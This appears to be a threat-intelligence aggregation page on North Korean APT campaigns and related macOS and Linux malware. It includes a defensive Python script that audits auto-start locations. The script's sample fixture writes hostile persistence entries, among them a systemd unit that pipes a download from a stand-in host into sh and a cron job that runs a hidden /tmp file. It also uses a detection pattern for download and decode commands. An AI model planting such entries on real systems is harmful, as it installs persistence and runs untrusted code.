Scarcruft (APT37) Ransomware Campaign Targets South Korea
Summary
North Korean threat actors have rapidly weaponized the **React2Shell (CVE-2025-55182)** vulnerability to deploy **EtherRAT**, a sophisticated Linux malware implant that leverages **Ethereum smart contracts for resilient C2 communication**. Discovered in December 2025, EtherRAT employs a **consensus-based voting mechanism** across nine public Ethereum RPC endpoints to resist sinkholing, alongside **five redundant persistence methods** (systemd, XDG autostart, cron jobs, bashrc/profile injection) and a **self-updating capability** that fetches obfuscated replacement code to evade static detection. The malware’s encrypted loader pattern closely mirrors **BeaverTail**, reinforcing its ties to the **Contagious Interview campaign**, which has now expanded to exploit **VS Code’s auto-run tasks.json** via malicious GitHub repositories. This campaign continues a broader pattern of North Korean APT groups—including **Scarcruft (APT37)**, **Konni**, and **BlueNoroff (Lazarus subgroup)**—targeting South Korea and global cryptocurrency sectors with multi-stage attacks. Earlier efforts combined **spear-phishing (Operation HanKook Phantom)**, **social engineering via KakaoTalk**, and **destructive operations** like remote Android device wipes via Google’s Find Hub. The integration of **React2Shell exploitation** into EtherRAT underscores the group’s agility in weaponizing zero-day flaws, while its overlap with **EtherHiding** and **fake recruitment campaigns (GhostCall/GhostHire)** highlights a strategic focus on **credential theft, cryptocurrency heists, and persistent access** to high-value targets.
Timeline
10.11.2025 22:29 · 4 articles
Konni Exploits Google's Find Hub for Remote Data Wiping
North Korean threat actors, including Konni APT (APT37/Kimsuky), have weaponized Google’s Find Hub service to remotely reset Android devices in South Korea, marking the first confirmed instance of a nation-state APT abusing this feature for destructive operations. The campaign, discovered in November 2025, involves a two-stage attack: initial spear-phishing (since July 2024) targeting Android devices via spoofed entities (e.g., National Tax Service), followed by secondary malware distribution through compromised KakaoTalk PC sessions. Attackers compromised the account of a psychological counselor for North Korean defectors on September 5, 2025, using it to distribute a digitally signed MSI installer ('Stress Clear.msi') disguised as a stress-relief program. The installer deployed AutoIt loaders that established persistence via scheduled tasks and C2 communication, fetching RATs like RemcosRAT, QuasarRAT, and RftRAT. Using stolen Google credentials, attackers tracked victim locations via Find Hub and triggered remote wipes when targets were away, delaying discovery and severing communication channels. The attack chain also involved prolonged internal reconnaissance, exfiltration of PII and webcam captures, and exploitation of Find Hub’s location tracking to execute remote resets. This tactic combines device sabotage, credential theft, and social engineering to erase forensic evidence and amplify the campaign’s reach through trusted contacts. The MSI installer’s setup routine deleted traces to hinder analysis, while AutoIt scripts maintained continuous C2 communication.
Sources:
- Konni Hackers Turn Google’s Find Hub into a Remote Data-Wiping Weapon — thehackernews.com — 10.11.2025 22:29
- APT37 hackers abuse Google Find Hub in Android data-wiping attacks — www.bleepingcomputer.com — 11.11.2025 02:46
- Kimsuky APT Takes Over South Korean Androids, Abuses KakaoTalk — www.darkreading.com — 11.11.2025 13:40
- Android Devices Targeted By KONNI APT in Find Hub Exploitation — www.infosecurity-magazine.com — 11.11.2025 18:45
25.09.2025 16:14 · 8 articles
North Korean Threat Actors Launch Contagious Interview Campaign
The **Contagious Interview campaign**, attributed to North Korean actors including **Lazarus/BlueNoroff**, has expanded with the discovery of **EtherRAT**, a new Linux malware implant exploiting the **React2Shell (CVE-2025-55182)** vulnerability in Next.js applications. Deployed in December 2025, EtherRAT leverages **Ethereum smart contracts for C2 communication**, querying **nine public RPC providers in parallel** via a **consensus voting mechanism** to resist sinkholing. It employs **five redundant persistence mechanisms** (cron jobs, bashrc injection, XDG autostart, systemd, profile injection) and a **self-updating capability**—fetching obfuscated replacement code via API—to evade static detection. Its **encrypted loader pattern** closely resembles the **BeaverTail malware** used in earlier Contagious Interview operations. The campaign continues to target **Web3/cryptocurrency developers** and **global tech sectors** with fake job offers, malicious packages (npm/PyPI/RubyGems), and multi-stage payloads (e.g., **JADESNOW, InvisibleFerret**). EtherRAT’s rapid deployment—**within 48 hours of CVE-2025-55182’s disclosure**—demonstrates the group’s agility in weaponizing zero-day flaws. Recent adaptations include **VS Code auto-run tasks.json abuse** via malicious GitHub repositories, with **13 campaign variants** identified across **27 GitHub users** since April 2025. The shift to **Vercel-exclusive hosting** and abandonment of prior providers (Fly.io, Platform.sh) underscores operational refinement. Prior iterations used **EtherHiding** (smart contract-hosted payloads) and **Discord webhooks for exfiltration**, with over **338 malicious packages** published and **50,000+ downloads** across ecosystems. The campaign’s **cross-platform scope** (Windows/macOS/Linux) and **collaboration with North Korea’s fraudulent IT workers (WageMole)** highlight its dual role in **espionage** and **financial theft**.
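The paragraph above lists the auto-start locations EtherRAT is reported to abuse (systemd, XDG autostart, cron, bashrc/profile) and the VS Code tasks.json auto-run trick. The script below is an added example of how a defender might sweep those same locations on a developer workstation; it is not code from the report, from any vendor, or from the malware itself. The directory layout, the `SUSPICIOUS` command heuristics, the fixture contents and the `example.invalid` URL are all constructed assumptions for this example.

```python
# Added example: audit the auto-start locations named above (systemd, XDG
# autostart, cron, shell rc files, VS Code tasks.json). Paths and heuristics
# are assumptions for this example, not indicators from the report.
import json
import re
import tempfile
from pathlib import Path

# Command fragments that rarely belong in a start-up entry on a workstation.
SUSPICIOUS = re.compile(r"(curl |wget |base64\s+-d|python3?\s+-c|nohup |/tmp/|/dev/shm/)")

def _flag(kind, path, line):
    return {"kind": kind, "path": str(path), "line": line.strip()}

def _files(d, pattern="*"):
    """Regular files under d matching pattern; empty when d does not exist."""
    return sorted(p for p in d.glob(pattern) if p.is_file()) if d.is_dir() else []

def _matching_lines(path, prefix=""):
    """Non-comment lines of path that start with prefix and hit SUSPICIOUS."""
    if not path.is_file():
        return
    for line in path.read_text(errors="replace").splitlines():
        if line.startswith(prefix) and not line.lstrip().startswith("#") and SUSPICIOUS.search(line):
            yield line

def audit_systemd(root, home):
    """ExecStart= lines in system-wide and per-user unit files."""
    dirs = (root / "etc/systemd/system", home / ".config/systemd/user")
    return [_flag("systemd", u, l) for d in dirs for u in _files(d, "*.service")
            for l in _matching_lines(u, "ExecStart=")]

def audit_xdg_autostart(home):
    """Exec= lines in ~/.config/autostart/*.desktop, run at desktop login."""
    return [_flag("xdg-autostart", f, l) for f in _files(home / ".config/autostart", "*.desktop")
            for l in _matching_lines(f, "Exec=")]

def audit_cron(root):
    """System crontab, /etc/cron.d drop-ins and per-user spool entries."""
    files = ([root / "etc/crontab"] + _files(root / "etc/cron.d")
             + _files(root / "var/spool/cron/crontabs"))
    return [_flag("cron", f, l) for f in files for l in _matching_lines(f)]

def audit_shell_rc(home):
    """Lines injected into the files an interactive shell sources at start-up."""
    names = (".bashrc", ".profile", ".bash_profile")
    return [_flag("shell-rc", home / n, l) for n in names for l in _matching_lines(home / n)]

def audit_vscode_tasks(workspace):
    """Tasks with runOptions.runOn == "folderOpen" start as soon as the folder is opened."""
    out = []
    for f in sorted(workspace.rglob("tasks.json")):
        if f.parent.name != ".vscode":
            continue
        text = re.sub(r"^\s*//.*$", "", f.read_text(errors="replace"), flags=re.M)  # drop JSONC comments
        try:
            data = json.loads(text)
        except ValueError:
            out.append(_flag("vscode-task", f, "unparseable tasks.json; review by hand"))
            continue
        for t in data.get("tasks", []) if isinstance(data, dict) else []:
            if isinstance(t, dict) and t.get("runOptions", {}).get("runOn") == "folderOpen":
                out.append(_flag("vscode-task", f, f"{t.get('label')}: {t.get('command')}"))
    return out

def audit_all(root, home, workspace):
    """Run every check; on a live host: audit_all(Path('/'), Path.home(), Path('~/src').expanduser())."""
    return (audit_systemd(root, home) + audit_xdg_autostart(home) + audit_cron(root)
            + audit_shell_rc(home) + audit_vscode_tasks(workspace))

def build_fixture():
    """Constructed sample tree with one clean and one suspect entry per location."""
    base = Path(tempfile.mkdtemp(prefix="persist_audit_"))
    root, home, ws = base / "root", base / "home", base / "ws"
    files = {
        root / "etc/systemd/system/benign.service": "[Service]\nExecStart=/usr/bin/sshd -D\n",
        home / ".config/systemd/user/updater.service":
            "[Service]\nExecStart=/bin/sh -c 'curl -s http://example.invalid/u | sh'\n",
        home / ".config/autostart/helper.desktop": "[Desktop Entry]\nExec=/dev/shm/.helper\n",
        root / "etc/cron.d/sync": "# constructed sample\n*/5 * * * * root nohup /tmp/.x >/dev/null 2>&1\n",
        home / ".bashrc": "alias ll='ls -l'\n(python3 -c 'import base64' &) 2>/dev/null\n",
        home / ".profile": "export PATH=$HOME/bin:$PATH\n",
        ws / "repo/.vscode/tasks.json": json.dumps({"version": "2.0.0", "tasks": [
            {"label": "setup", "type": "shell", "command": "npm install",
             "runOptions": {"runOn": "folderOpen"}}]}),
    }
    for p, text in files.items():
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(text)
    return root, home, ws

def demo():
    """Audit the constructed fixture; returns one finding per suspect entry (five in all)."""
    return audit_all(*build_fixture())
```

`demo()` builds the fixture in a temporary directory and returns five findings, one per location, while the clean `benign.service` and the plain `.profile` produce nothing. The keyword heuristics are deliberately narrow so that the output stays reviewable; a real sweep would diff these locations against a known-good baseline rather than rely on string matching alone, and would pair it with the file-modification times, since the page notes the implant rewrites its own code to defeat static signatures.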
Sources:
- North Korean Hackers Use New AkdoorTea Backdoor to Target Global Crypto Developers — thehackernews.com — 25.09.2025 16:14
- North Korea’s Fake Recruiters Feed Stolen Data to IT Workers — www.securityweek.com — 26.09.2025 15:01
- npm, PyPI, and RubyGems Packages Found Sending Developer Data to Discord Channels — thehackernews.com — 14.10.2025 10:09
- North Korean hackers use EtherHiding to hide malware on the blockchain — www.bleepingcomputer.com — 16.10.2025 17:00
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
- North Korean hackers exploit React2Shell flaw in EtherRAT malware attacks — www.bleepingcomputer.com — 09.12.2025 17:43
- North Korea-linked Actors Exploit React2Shell to Deploy New EtherRAT Malware — thehackernews.com — 09.12.2025 20:25
10.09.2025 16:04 · 1 article
ZynorRAT RAT Targets Windows, Linux, and macOS Systems
A new malware family, ZynorRAT, has been discovered, targeting Windows, Linux, and macOS systems. ZynorRAT is a Go-based remote access trojan that uses a Telegram bot for command and control. The malware supports a wide range of functions, including file exfiltration, system enumeration, screenshot capture, and arbitrary command execution. The Windows version of ZynorRAT is near-identical to its Linux counterpart, indicating ongoing development. ZynorRAT is believed to be the work of a lone actor possibly of Turkish origin.
Sources:
- CHILLYHELL macOS Backdoor and ZynorRAT RAT Threaten macOS, Windows, and Linux Systems — thehackernews.com — 10.09.2025 16:04
10.09.2025 14:59 · 2 articles
ChillyHell macOS Backdoor Resurfaces with New Version
ChillyHell is written in C++ and developed for Intel architectures. The malware is attributed to an uncategorized threat cluster dubbed UNC4487, active since at least October 2022. UNC4487 is a suspected espionage actor that has compromised Ukrainian government websites to deploy ChillyHell. The malware establishes persistence using LaunchAgent, LaunchDaemon, and modifying the user's shell profile. It uses timestomping to modify file timestamps to evade detection. ChillyHell supports commands to launch a reverse shell, download new versions, fetch additional payloads, enumerate user accounts, and conduct brute-force attacks. The malware was notarized by Apple, highlighting that not all malicious code comes unsigned.
Sources:
- Dormant macOS Backdoor ChillyHell Resurfaces — www.darkreading.com — 10.09.2025 14:59
- CHILLYHELL macOS Backdoor and ZynorRAT RAT Threaten macOS, Windows, and Linux Systems — thehackernews.com — 10.09.2025 16:04
01.09.2025 11:26 · 1 article
Scarcruft (APT37) Launches Operation HanKook Phantom Targeting South Korean Academics
In September 2025, a new phishing campaign, Operation HanKook Phantom, was discovered. This campaign targets individuals associated with the National Intelligence Research Association, including academic figures, former government officials, and researchers. The campaign uses spear-phishing emails with a lure for a "National Intelligence Research Society Newsletter" containing a ZIP archive attachment with a Windows shortcut (LNK) masquerading as a PDF document. The LNK file drops RokRAT malware, which is capable of collecting system information, executing arbitrary commands, enumerating the file system, capturing screenshots, and downloading additional payloads. RokRAT exfiltrates data via Dropbox, Google Cloud, pCloud, and Yandex Cloud. The campaign also involves a PowerShell script that deploys a dropper, which then runs a next-stage payload to steal sensitive data while concealing network traffic as a Chrome file upload. The lure document used in this instance is a statement issued by Kim Yo Jong, the Deputy Director of the Publicity and Information Department of the Workers' Party of Korea, rejecting Seoul's efforts at reconciliation.
Sources:
- ScarCruft Uses RokRAT Malware in Operation HanKook Phantom Targeting South Korean Academics — thehackernews.com — 01.09.2025 11:26
14.08.2025 03:00 · 2 articles
Scarcruft (APT37) Launches Ransomware Campaign Targeting South Korea
In July 2025, the North Korean threat group Scarcruft (APT37) initiated a new campaign targeting South Korea with a combination of infostealers, backdoors, and ransomware. The campaign, dubbed ChinopuNK, includes multiple malware tools designed for espionage and financial gain. The attacks start with phishing emails containing decoy documents about postal code updates. Once opened, these documents download NubSpy, a backdoor that uses the PubNub cloud service for command-and-control (C2) communication. The group also deploys ChillyChino, a PowerShell backdoor rewritten in Rust, and VCD ransomware, which encrypts specific file paths tailored to individual targets. The campaign is notable for its use of ransomware by a nation-state actor, combining espionage with financial and psychological pressure tactics.
Sources:
- North Korea Attacks South Koreans With Ransomware — www.darkreading.com — 14.08.2025 03:00
- ScarCruft Uses RokRAT Malware in Operation HanKook Phantom Targeting South Korean Academics — thehackernews.com — 01.09.2025 11:26
Information Snippets
Scarcruft (APT37) is a North Korean threat group known for financially motivated cyberattacks.
First reported: 14.08.2025 03:00 · 2 sources, 5 articles. Sources:
- North Korea Attacks South Koreans With Ransomware — www.darkreading.com — 14.08.2025 03:00
- ScarCruft Uses RokRAT Malware in Operation HanKook Phantom Targeting South Korean Academics — thehackernews.com — 01.09.2025 11:26
- North Korean Hackers Use New AkdoorTea Backdoor to Target Global Crypto Developers — thehackernews.com — 25.09.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
- Konni Hackers Turn Google’s Find Hub into a Remote Data-Wiping Weapon — thehackernews.com — 10.11.2025 22:29
The ChinopuNK campaign began in July 2025, with some malware samples dating back to February 2025.
First reported: 14.08.2025 03:00 · 1 source, 1 article. Sources:
- North Korea Attacks South Koreans With Ransomware — www.darkreading.com — 14.08.2025 03:00
The campaign uses phishing emails with decoy documents about postal code updates.
First reported: 14.08.2025 03:00 · 2 sources, 2 articles. Sources:
- North Korea Attacks South Koreans With Ransomware — www.darkreading.com — 14.08.2025 03:00
- ScarCruft Uses RokRAT Malware in Operation HanKook Phantom Targeting South Korean Academics — thehackernews.com — 01.09.2025 11:26
The NubSpy backdoor uses the PubNub cloud service for C2 communication.
First reported: 14.08.2025 03:00 · 1 source, 1 article. Sources:
- North Korea Attacks South Koreans With Ransomware — www.darkreading.com — 14.08.2025 03:00
ChillyChino is a PowerShell backdoor rewritten in Rust to evade detection.
First reported: 14.08.2025 03:00 · 1 source, 1 article. Sources:
- North Korea Attacks South Koreans With Ransomware — www.darkreading.com — 14.08.2025 03:00
VCD ransomware encrypts specific file paths tailored to individual targets.
First reported: 14.08.2025 03:00 · 1 source, 1 article. Sources:
- North Korea Attacks South Koreans With Ransomware — www.darkreading.com — 14.08.2025 03:00
The campaign includes at least nine separate malware tools.
First reported: 14.08.2025 03:00 · 1 source, 1 article. Sources:
- North Korea Attacks South Koreans With Ransomware — www.darkreading.com — 14.08.2025 03:00
Scarcruft's use of ransomware is rare and marks a shift from its traditional espionage profile.
First reported: 14.08.2025 03:00 · 1 source, 1 article. Sources:
- North Korea Attacks South Koreans With Ransomware — www.darkreading.com — 14.08.2025 03:00
Scarcruft (APT37) has launched a new phishing campaign, Operation HanKook Phantom, targeting individuals associated with the National Intelligence Research Association, including academic figures, former government officials, and researchers.
First reported: 01.09.2025 11:26 · 1 source, 1 article. Sources:
- ScarCruft Uses RokRAT Malware in Operation HanKook Phantom Targeting South Korean Academics — thehackernews.com — 01.09.2025 11:26
The campaign uses spear-phishing emails with a lure for a "National Intelligence Research Society Newsletter" containing a ZIP archive attachment with a Windows shortcut (LNK) masquerading as a PDF document.
First reported: 01.09.2025 11:26 · 1 source, 1 article. Sources:
- ScarCruft Uses RokRAT Malware in Operation HanKook Phantom Targeting South Korean Academics — thehackernews.com — 01.09.2025 11:26
The LNK file drops RokRAT malware, which is capable of collecting system information, executing arbitrary commands, enumerating the file system, capturing screenshots, and downloading additional payloads.
First reported: 01.09.2025 11:26 · 1 source, 1 article. Sources:
- ScarCruft Uses RokRAT Malware in Operation HanKook Phantom Targeting South Korean Academics — thehackernews.com — 01.09.2025 11:26
RokRAT exfiltrates data via Dropbox, Google Cloud, pCloud, and Yandex Cloud.
First reported: 01.09.2025 11:26 · 1 source, 1 article. Sources:
- ScarCruft Uses RokRAT Malware in Operation HanKook Phantom Targeting South Korean Academics — thehackernews.com — 01.09.2025 11:26
The campaign also involves a PowerShell script that deploys a dropper, which then runs a next-stage payload to steal sensitive data while concealing network traffic as a Chrome file upload.
First reported: 01.09.2025 11:26 · 1 source, 1 article. Sources:
- ScarCruft Uses RokRAT Malware in Operation HanKook Phantom Targeting South Korean Academics — thehackernews.com — 01.09.2025 11:26
The lure document used in this instance is a statement issued by Kim Yo Jong, the Deputy Director of the Publicity and Information Department of the Workers' Party of Korea, rejecting Seoul's efforts at reconciliation.
First reported: 01.09.2025 11:26 · 1 source, 1 article. Sources:
- ScarCruft Uses RokRAT Malware in Operation HanKook Phantom Targeting South Korean Academics — thehackernews.com — 01.09.2025 11:26
ChillyHell is a modular backdoor malware for the macOS platform that gives attackers remote access and allows them to drop payloads or brute-force passwords.
First reported: 10.09.2025 14:59 · 2 sources, 2 articles. Sources:
- Dormant macOS Backdoor ChillyHell Resurfaces — www.darkreading.com — 10.09.2025 14:59
- CHILLYHELL macOS Backdoor and ZynorRAT RAT Threaten macOS, Windows, and Linux Systems — thehackernews.com — 10.09.2025 16:04
ChillyHell was first discovered in an attack against officials in Ukraine three years ago and has resurfaced with a new version.
First reported: 10.09.2025 14:59 · 2 sources, 2 articles. Sources:
- Dormant macOS Backdoor ChillyHell Resurfaces — www.darkreading.com — 10.09.2025 14:59
- CHILLYHELL macOS Backdoor and ZynorRAT RAT Threaten macOS, Windows, and Linux Systems — thehackernews.com — 10.09.2025 16:04
The new ChillyHell sample was uploaded to VirusTotal on May 2, 2025, and was notarized by Apple in 2021.
First reported: 10.09.2025 14:59 · 2 sources, 2 articles. Sources:
- Dormant macOS Backdoor ChillyHell Resurfaces — www.darkreading.com — 10.09.2025 14:59
- CHILLYHELL macOS Backdoor and ZynorRAT RAT Threaten macOS, Windows, and Linux Systems — thehackernews.com — 10.09.2025 16:04
The malware comes disguised as an executable applet packaged as applet.app but deploys as a full-fledged, persistent backdoor.
First reported: 10.09.2025 14:59 · 2 sources, 2 articles. Sources:
- Dormant macOS Backdoor ChillyHell Resurfaces — www.darkreading.com — 10.09.2025 14:59
- CHILLYHELL macOS Backdoor and ZynorRAT RAT Threaten macOS, Windows, and Linux Systems — thehackernews.com — 10.09.2025 16:04
ChillyHell has multiple persistence mechanisms, including using LaunchAgent, LaunchDaemon, and modifying the user's shell profile.
First reported: 10.09.2025 14:59 · 2 sources, 2 articles. Sources:
- Dormant macOS Backdoor ChillyHell Resurfaces — www.darkreading.com — 10.09.2025 14:59
- CHILLYHELL macOS Backdoor and ZynorRAT RAT Threaten macOS, Windows, and Linux Systems — thehackernews.com — 10.09.2025 16:04
Once established, ChillyHell can exfiltrate data, drop additional payloads, enumerate user accounts, and perform local password cracking.
First reported: 10.09.2025 14:59 · 2 sources, 2 articles. Sources:
- Dormant macOS Backdoor ChillyHell Resurfaces — www.darkreading.com — 10.09.2025 14:59
- CHILLYHELL macOS Backdoor and ZynorRAT RAT Threaten macOS, Windows, and Linux Systems — thehackernews.com — 10.09.2025 16:04
ChillyHell uses timestomping to evade detection by modifying file timestamps on infected systems.
First reported: 10.09.2025 14:59 · 2 sources, 2 articles. Sources:
- Dormant macOS Backdoor ChillyHell Resurfaces — www.darkreading.com — 10.09.2025 14:59
- CHILLYHELL macOS Backdoor and ZynorRAT RAT Threaten macOS, Windows, and Linux Systems — thehackernews.com — 10.09.2025 16:04
Apple revoked notarization of the developer certificates associated with the malware once notified by Jamf.
First reported: 10.09.2025 14:59 · 2 sources, 2 articles. Sources:
- Dormant macOS Backdoor ChillyHell Resurfaces — www.darkreading.com — 10.09.2025 14:59
- CHILLYHELL macOS Backdoor and ZynorRAT RAT Threaten macOS, Windows, and Linux Systems — thehackernews.com — 10.09.2025 16:04
ChillyHell is written in C++ and developed for Intel architectures.
First reported: 10.09.2025 16:04 · 1 source, 1 article. Sources:
- CHILLYHELL macOS Backdoor and ZynorRAT RAT Threaten macOS, Windows, and Linux Systems — thehackernews.com — 10.09.2025 16:04
ChillyHell is attributed to an uncategorized threat cluster dubbed UNC4487, active since at least October 2022.
First reported: 10.09.2025 16:04 · 1 source, 1 article. Sources:
- CHILLYHELL macOS Backdoor and ZynorRAT RAT Threaten macOS, Windows, and Linux Systems — thehackernews.com — 10.09.2025 16:04
UNC4487 is a suspected espionage actor that has compromised Ukrainian government websites to deploy ChillyHell.
First reported: 10.09.2025 16:04 · 1 source, 1 article. Sources:
- CHILLYHELL macOS Backdoor and ZynorRAT RAT Threaten macOS, Windows, and Linux Systems — thehackernews.com — 10.09.2025 16:04
ChillyHell establishes persistence using LaunchAgent, LaunchDaemon, and modifying the user's shell profile.
First reported: 10.09.2025 16:04 · 1 source, 1 article. Sources:
- CHILLYHELL macOS Backdoor and ZynorRAT RAT Threaten macOS, Windows, and Linux Systems — thehackernews.com — 10.09.2025 16:04
ChillyHell uses timestomping to modify file timestamps to evade detection.
First reported: 10.09.2025 16:04 · 1 source, 1 article. Sources:
- CHILLYHELL macOS Backdoor and ZynorRAT RAT Threaten macOS, Windows, and Linux Systems — thehackernews.com — 10.09.2025 16:04
ChillyHell supports commands to launch a reverse shell, download new versions, fetch additional payloads, enumerate user accounts, and conduct brute-force attacks.
First reported: 10.09.2025 16:04 · 1 source, 1 article. Sources:
- CHILLYHELL macOS Backdoor and ZynorRAT RAT Threaten macOS, Windows, and Linux Systems — thehackernews.com — 10.09.2025 16:04
ChillyHell was notarized by Apple, highlighting that not all malicious code comes unsigned.
First reported: 10.09.2025 16:04 · 1 source, 1 article. Sources:
- CHILLYHELL macOS Backdoor and ZynorRAT RAT Threaten macOS, Windows, and Linux Systems — thehackernews.com — 10.09.2025 16:04
ZynorRAT is a Go-based RAT that targets Windows and Linux systems, using a Telegram bot for command and control.
First reported: 10.09.2025 16:04 · 1 source, 1 article. Sources:
- CHILLYHELL macOS Backdoor and ZynorRAT RAT Threaten macOS, Windows, and Linux Systems — thehackernews.com — 10.09.2025 16:04
ZynorRAT supports file exfiltration, system enumeration, screenshot capture, and arbitrary command execution.
First reported: 10.09.2025 16:04 · 1 source, 1 article. Sources:
- CHILLYHELL macOS Backdoor and ZynorRAT RAT Threaten macOS, Windows, and Linux Systems — thehackernews.com — 10.09.2025 16:04
ZynorRAT's Windows version is near-identical to its Linux counterpart, indicating ongoing development.
First reported: 10.09.2025 16:04 · 1 source, 1 article. Sources:
- CHILLYHELL macOS Backdoor and ZynorRAT RAT Threaten macOS, Windows, and Linux Systems — thehackernews.com — 10.09.2025 16:04
ZynorRAT is believed to be the work of a lone actor possibly of Turkish origin.
First reported: 10.09.2025 16:04 · 1 source, 1 article. Sources:
- CHILLYHELL macOS Backdoor and ZynorRAT RAT Threaten macOS, Windows, and Linux Systems — thehackernews.com — 10.09.2025 16:04
The North Korea-linked threat actors associated with the Contagious Interview campaign have been attributed to a previously undocumented backdoor called AkdoorTea, along with tools like TsunamiKit and Tropidoor.
First reported: 25.09.2025 16:14 · 3 sources, 5 articles. Sources:
- North Korean Hackers Use New AkdoorTea Backdoor to Target Global Crypto Developers — thehackernews.com — 25.09.2025 16:14
- North Korea’s Fake Recruiters Feed Stolen Data to IT Workers — www.securityweek.com — 26.09.2025 15:01
- npm, PyPI, and RubyGems Packages Found Sending Developer Data to Discord Channels — thehackernews.com — 14.10.2025 10:09
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
The campaign targets software developers across all operating systems, Windows, Linux, and macOS, particularly those involved in cryptocurrency and Web3 projects.
First reported: 25.09.2025 16:14 · 4 sources, 6 articles. Sources:
- North Korean Hackers Use New AkdoorTea Backdoor to Target Global Crypto Developers — thehackernews.com — 25.09.2025 16:14
- North Korea’s Fake Recruiters Feed Stolen Data to IT Workers — www.securityweek.com — 26.09.2025 15:01
- npm, PyPI, and RubyGems Packages Found Sending Developer Data to Discord Channels — thehackernews.com — 14.10.2025 10:09
- North Korean hackers use EtherHiding to hide malware on the blockchain — www.bleepingcomputer.com — 16.10.2025 17:00
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
The campaign involves impersonated recruiters offering lucrative job roles over platforms like LinkedIn, Upwork, Freelancer, and Crypto Jobs List.
First reported: 25.09.2025 16:14 · 4 sources, 6 articles. Sources:
- North Korean Hackers Use New AkdoorTea Backdoor to Target Global Crypto Developers — thehackernews.com — 25.09.2025 16:14
- North Korea’s Fake Recruiters Feed Stolen Data to IT Workers — www.securityweek.com — 26.09.2025 15:01
- npm, PyPI, and RubyGems Packages Found Sending Developer Data to Discord Channels — thehackernews.com — 14.10.2025 10:09
- North Korean hackers use EtherHiding to hide malware on the blockchain — www.bleepingcomputer.com — 16.10.2025 17:00
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
The attacks deliver several pieces of malware such as BeaverTail, InvisibleFerret, OtterCookie, GolangGhost, and PylangGhost.
First reported: 25.09.2025 16:14 · 4 sources, 6 articles. Sources:
- North Korean Hackers Use New AkdoorTea Backdoor to Target Global Crypto Developers — thehackernews.com — 25.09.2025 16:14
- North Korea’s Fake Recruiters Feed Stolen Data to IT Workers — www.securityweek.com — 26.09.2025 15:01
- npm, PyPI, and RubyGems Packages Found Sending Developer Data to Discord Channels — thehackernews.com — 14.10.2025 10:09
- North Korean hackers use EtherHiding to hide malware on the blockchain — www.bleepingcomputer.com — 16.10.2025 17:00
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
WeaselStore's functionality is similar to BeaverTail and InvisibleFerret, focusing on exfiltration of sensitive data from browsers and cryptocurrency wallets.
First reported: 25.09.2025 16:14 · 4 sources, 6 articles. Sources:
- North Korean Hackers Use New AkdoorTea Backdoor to Target Global Crypto Developers — thehackernews.com — 25.09.2025 16:14
- North Korea’s Fake Recruiters Feed Stolen Data to IT Workers — www.securityweek.com — 26.09.2025 15:01
- npm, PyPI, and RubyGems Packages Found Sending Developer Data to Discord Channels — thehackernews.com — 14.10.2025 10:09
- North Korean hackers use EtherHiding to hide malware on the blockchain — www.bleepingcomputer.com — 16.10.2025 17:00
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
TsunamiKit is a malware toolkit designed for information and cryptocurrency theft, first discovered in November 2024.
First reported: 25.09.2025 16:14 · 4 sources, 5 articles. Sources:
- North Korean Hackers Use New AkdoorTea Backdoor to Target Global Crypto Developers — thehackernews.com — 25.09.2025 16:14
- North Korea’s Fake Recruiters Feed Stolen Data to IT Workers — www.securityweek.com — 26.09.2025 15:01
- North Korean hackers use EtherHiding to hide malware on the blockchain — www.bleepingcomputer.com — 16.10.2025 17:00
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
TsunamiKit comprises several components, including TsunamiLoader, TsunamiInjector, TsunamiInstaller, TsunamiHardener, and TsunamiClient.
First reported: 25.09.2025 16:14 · 4 sources, 5 articles. Sources:
- North Korean Hackers Use New AkdoorTea Backdoor to Target Global Crypto Developers — thehackernews.com — 25.09.2025 16:14
- North Korea’s Fake Recruiters Feed Stolen Data to IT Workers — www.securityweek.com — 26.09.2025 15:01
- North Korean hackers use EtherHiding to hide malware on the blockchain — www.bleepingcomputer.com — 16.10.2025 17:00
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
TsunamiClient incorporates a .NET spyware and drops cryptocurrency miners like XMRig and NBMiner.
First reported: 25.09.2025 16:14 · 4 sources, 5 articles. Sources:
- North Korean Hackers Use New AkdoorTea Backdoor to Target Global Crypto Developers — thehackernews.com — 25.09.2025 16:14
- North Korea’s Fake Recruiters Feed Stolen Data to IT Workers — www.securityweek.com — 26.09.2025 15:01
- North Korean hackers use EtherHiding to hide malware on the blockchain — www.bleepingcomputer.com — 16.10.2025 17:00
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
Tropidoor is a sophisticated payload linked to the DeceptiveDevelopment group, sharing code with PostNapTea and LightlessCan.
First reported: 25.09.2025 16:14 · 2 sources, 3 articles. Sources:
- North Korean Hackers Use New AkdoorTea Backdoor to Target Global Crypto Developers — thehackernews.com — 25.09.2025 16:14
